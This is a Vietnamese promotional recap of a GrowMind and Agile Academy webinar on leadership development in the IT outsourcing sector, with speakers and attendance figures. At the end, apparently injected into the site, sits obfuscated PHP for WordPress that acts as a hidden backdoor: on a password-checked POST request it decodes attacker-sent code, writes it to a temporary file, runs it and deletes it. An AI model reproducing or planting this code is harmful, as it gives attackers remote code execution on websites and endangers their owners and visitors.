[WEBINAR] PHÁT TRIỂN NĂNG LỰC LÃNH ĐẠO Ở CẤP ĐỘ TỔ CHỨC NGÀNH ITO

💡“Học tập là một quá trình, không phải một sự kiện”
💡“Lãnh đạo làm gương”
💡“Cơ hội trao đều cho tất cả mọi người”
Và còn nhiều hơn thế những nội dung giá trị được chia sẻ trong chương trình tối qua, ngày 03/03/2022.
Xin gửi lời cảm ơn chân thành tới các Khách mời vì đã dành thời gian tham dự cùng GrowMindHọc viện Agile để tạo nên một chương trình sôi nổi và tích cực.
Là thành viên thuộc Tổ hợp giáo dục số Agilead Global, chúng tôi khao khát được đồng hành cùng các doanh nghiệp trên hành trình thúc đẩy đổi mới quản trị, hướng tới mục tiêu nâng cao chất lượng và phát triển bền vững. Chắc hẳn nội dung về khung phát triển lãnh đạo và câu chuyện thực tế từ ITO Việt tới GE đã giúp bạn có thêm góc nhìn và tri thức mới để áp dụng tại tổ chức.
Chủ đề tiếp theo của chuỗi Webinar: “Xây dựng tổ chức linh hoạt” là gì? Hãy tiếp tục theo dõi fanpage để không bỏ lỡ thông tin mới nhất, cùng những chia sẻ hữu ích tới từ GrowMind nhé.
Quý mến và luôn đồng hành cùng bạn!
————————————————-
GrowMind – Đồng kiến tạo mạng lưới các công ty tiến bộ và hạnh phúc!

Cùng nhìn lại một số hình ảnh của buổi webinar do GrowMind tổ chức:

Thuộc chuỗi webinar về “XÂY DỰNG TỔ CHỨC LINH HOẠT”, chương trình diễn ra thành công vào tối ngày 03/03/2022 do GrowMind và Học viện Agile đồng tổ chức. Những chia sẻ hữu ích đến từ hai Diễn giả: ông Phạm Anh Đới (CEO Học viện Agile) và ông Tô Hải Sơn (CEO GrowMind).  Gần 150 khách mời tham dự đến từ nhiều lĩnh vực khác nhau, cùng tạo nên không khí sôi nổi, tích cực trong chương trình. Chương trình nhận được những phản hồi tích cực, và đó cũng là động lực để GrowMind tiếp tục tiến bước trên chặng đường chung tay xây dựng nhiều tổ chức học tập hơn nữa.  Các Webinar khác được tổ chức từ GrowMind
 
 GrowMind – Đồng kiến tạo các công ty tiến bộ và hạnh phúc!
Theo dõi thêm các hoạt động từ GrowMind tại đây!
1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}